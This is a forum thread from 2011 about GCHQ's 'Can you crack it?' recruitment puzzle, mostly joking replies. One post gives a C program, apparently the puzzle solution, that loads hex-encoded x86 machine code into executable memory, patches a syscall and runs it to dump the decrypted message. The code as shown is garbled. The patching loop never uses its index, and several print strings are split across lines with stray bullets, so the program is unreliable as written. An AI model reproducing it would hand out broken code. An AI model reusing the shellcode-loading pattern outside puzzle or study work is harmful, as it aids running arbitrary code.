MK5 Golf GTI

General => Random Chat => Topic started by: rich83 on December 03, 2011, 09:26:54 am

Title: Can you crack it??
Post by: rich83 on December 03, 2011, 09:26:54 am

http://www.canyoucrackit.co.uk/

GCHQs latest recruitment drive.

Rich

Title: Re: Can you crack it??
Post by: WhiteGTI on December 03, 2011, 01:50:38 pm

Wouldn't even know where to begin with that...

Title: Re: Can you crack it??
Post by: MPS on December 03, 2011, 02:03:26 pm

Unless I'm very much mistaken, that looks like hexadecimal code.

Title: Re: Can you crack it??
Post by: rich83 on December 03, 2011, 02:18:49 pm

Quote from: MPS on December 03, 2011, 02:03:26 pm

Unless I'm very much mistaken, that looks like hexadecimal code.

It is hex.... thats as far as i got!  :signLOL:

Title: Re: Can you crack it??
Post by: PDT on December 03, 2011, 03:34:26 pm

Quote from: MPS on December 03, 2011, 02:03:26 pm

Unless I'm very much mistaken, that looks like hexadecimal code.

Same format as  used in ECU software....  :evilgrin:

Title: Re: Can you crack it??
Post by: rich83 on December 03, 2011, 03:36:35 pm

Quote from: PDT on December 03, 2011, 03:34:26 pm

Quote from: MPS on December 03, 2011, 02:03:26 pm

Unless I'm very much mistaken, that looks like hexadecimal code.

Same format as  used in ECU software....  :evilgrin:

Come on then.....  you and nick should be able to do this blind folded.  :grin:

Title: Re: Can you crack it??
Post by: sub39h on December 03, 2011, 03:36:53 pm

go it... but i won't ruin it for the rest of you  :grin:

Title: Re: Can you crack it??
Post by: monte on December 03, 2011, 05:22:10 pm

Well just to be clever, where it says enter Keyword:………………………... I wrote "Keyword"  :laugh:
:laugh:
:laugh:
:laugh:
:laugh:
:laugh:
:laugh:
:laugh:
:laugh:
:laugh:
:laugh:
:laugh:
:laugh:
:laugh:
:laugh:
:laugh:
:laugh:
:laugh:
:laugh:
:laugh:
:laugh:
:laugh:
:laugh:
:laugh:
:laugh:
:laugh:
:laugh:
:laugh:
:laugh:
:laugh:
:laugh:
:laugh:
:laugh:
:laugh:
:laugh:
:laugh:
:laugh:
:laugh:
But it was incorrect  :sad1:

Title: Re: Can you crack it??
Post by: B3n on December 03, 2011, 06:00:04 pm

^^^^^^^^ :laugh: :laugh: :laugh: :laugh: :laugh: :laugh: :laugh: :laugh:

I done the same thing :signLOL:

Im awaiting the phone call with the job offer :signLOL:

Title: Re: Can you crack it??
Post by: 182_blue on December 03, 2011, 09:23:52 pm

 :P :P
http://www.canyoucrackit.co.uk/soyoudidit.asp

Title: Re: Can you crack it??
Post by: rob172cup on December 03, 2011, 09:31:17 pm

Quote from: 182_blue on December 03, 2011, 09:23:52 pm

:P :P
http://www.canyoucrackit.co.uk/soyoudidit.asp

i just used your link to apply ha ha they will soon realise im thick as sh*t !

Title: Re: Can you crack it??
Post by: rich83 on December 03, 2011, 09:31:55 pm

Quote from: 182_blue on December 03, 2011, 09:23:52 pm

:P :P
http://www.canyoucrackit.co.uk/soyoudidit.asp

LOL

Title: Re: Can you crack it??
Post by: Horatio on December 03, 2011, 10:53:34 pm

Quote

Could you use your skills and ingenuity to combat terrorism and cyber threats?

This made me laugh!  :stupid: :signLOL:

Title: Re: Can you crack it??
Post by: Deako on December 05, 2011, 08:32:53 am

Here is the proper solution:

Quote

#include <stdio.h>
#include <stdint.h>
#include <malloc.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <time.h>
#include <sys/types.h>
#include <sys/mman.h>
#include <sys/utsname.h>

#include "part2.h" // see information above

static char part1[] = {
    0xeb, 0x04, 0xaf, 0xc2, 0xbf, 0xa3, 0x81, 0xec,   0x00, 0x01, 0x00, 0x00, 0x31, 0xc9, 0x88, 0x0c,
    0x0c, 0xfe, 0xc1, 0x75, 0xf9, 0x31, 0xc0, 0xba,   0xef, 0xbe, 0xad, 0xde, 0x02, 0x04, 0x0c, 0x00,
    0xd0, 0xc1, 0xca, 0x08, 0x8a, 0x1c, 0x0c, 0x8a,   0x3c, 0x04, 0x88, 0x1c, 0x04, 0x88, 0x3c, 0x0c,
    0xfe, 0xc1, 0x75, 0xe8, 0xe9, 0x5c, 0x00, 0x00,   0x00, 0x89, 0xe3, 0x81, 0xc3, 0x04, 0x00, 0x00,
    0x00, 0x5c, 0x58, 0x3d, 0x41, 0x41, 0x41, 0x41,   0x75, 0x43, 0x58, 0x3d, 0x42, 0x42, 0x42, 0x42,
    0x75, 0x3b, 0x5a, 0x89, 0xd1, 0x89, 0xe6, 0x89,   0xdf, 0x29, 0xcf, 0xf3, 0xa4, 0x89, 0xde, 0x89,
    0xd1, 0x89, 0xdf, 0x29, 0xcf, 0x31, 0xc0, 0x31,   0xdb, 0x31, 0xd2, 0xfe, 0xc0, 0x02, 0x1c, 0x06,
    0x8a, 0x14, 0x06, 0x8a, 0x34, 0x1e, 0x88, 0x34,   0x06, 0x88, 0x14, 0x1e, 0x00, 0xf2, 0x30, 0xf6,
    0x8a, 0x1c, 0x16, 0x8a, 0x17, 0x30, 0xda, 0x88,   0x17, 0x47, 0x49, 0x75, 0xde, 0x31, 0xdb, 0x89,
    0xd8, 0xfe, 0xc0, 0xcd, 0x80, 0x90, 0x90, 0xe8,   0x9d, 0xff, 0xff, 0xff, 0x41, 0x41, 0x41, 0x41,
};

// code to dump the decrypted memory:
static const char dump_mem[] = {
    0xba, 0x31, 0x00, 0x00, 0x00,   // mov    edx, 0x40
    0x8d, 0x4f, 0xce,               // lea    ecx, [edi-0x32]
    0x31, 0xdb,                     // xor    ebx, ebx
    0x43,                           // inc    ebx (stdout)
    0x31, 0xc0,                     // xor    eax, eax
    0xb0, 0x04,                     // add    al, 0x4           - sys_write
    0xcd, 0x80,                     // int    0x80
    0x31, 0xdb,                     // xor    ebx,ebx
    0x43,                           // inc    ebx
    0x31, 0xd2,                     // xor    edx,edx
    0x42,                           // inc    edx
    0x68, 0x0a, 0x00,0x00, 0x00,    // push   0xa
    0x8d, 0x0c, 0x24,               // lea    ecx,[esp]
    0xb8, 0x04, 0x00,0x00, 0x00,    // mov    eax, 0x4
    0xcd, 0x80,                     // int    0x80              - sys_write
    0x31, 0xdb,                     // xor    ebx,ebx
    0x31, 0xc0,                     // xor    eax,eax
    0x40,                           // inc    eax
    0xcd, 0x80,                     // int    0x80              - sys_exit
};

uint32_t patch_mem(char *ptr, size_t size)
{
    uint32_t i;

    for (i = 0; i < size; i++) {
        if (*(uint16_t *)&ptr == 0x80cd) {
            *(uint16_t *)&ptr = 0x45eb;
            return 0;
        }
    }
    return 1;
}

uint32_t check_arch(void)
{
    struct utsname kernel_info;

    uname(&kernel_info);
    return strcmp(kernel_info.machine, "i686") ? 1 : 0;
}

int main(int argc, char **argv)
{
    void *mem;

    if (check_arch()) {
        printf("[-] this program must run on a 32-bit architecture\n");
        return 1;
    }

    printf("

• allocating page aligned memory\n");

    mem = memalign(4096, 4096);
    if (!mem) {
        printf("[-] error: %s\n", strerror(errno));
        return 1;
    }
    memset(mem, 0, 4096);

    printf("

• setting page permissions\n");

    if (mprotect(mem, 4096, PROT_READ | PROT_WRITE | PROT_EXEC)) {
        printf("[-] error: %s\n", strerror(errno));
        return 1;
    }

    printf("

• copying payload\n");

    memcpy(mem, part1, sizeof(part1));
    memcpy(mem + sizeof(part1), part2, sizeof(part2));
    memcpy(mem + sizeof(part1) + sizeof(part2), dump_mem, sizeof(dump_mem));

    printf("

• adding dump_mem payload\n");

    if (patch_mem(mem, sizeof(part1))) {
        printf("[-] failed to patch memory\n");
        return 0;
    }

    printf("

• executing payload..\n\n");

    ((int(*)(void))mem)();

    return 0;
}

Worked it out on my own. LOL. Errr.........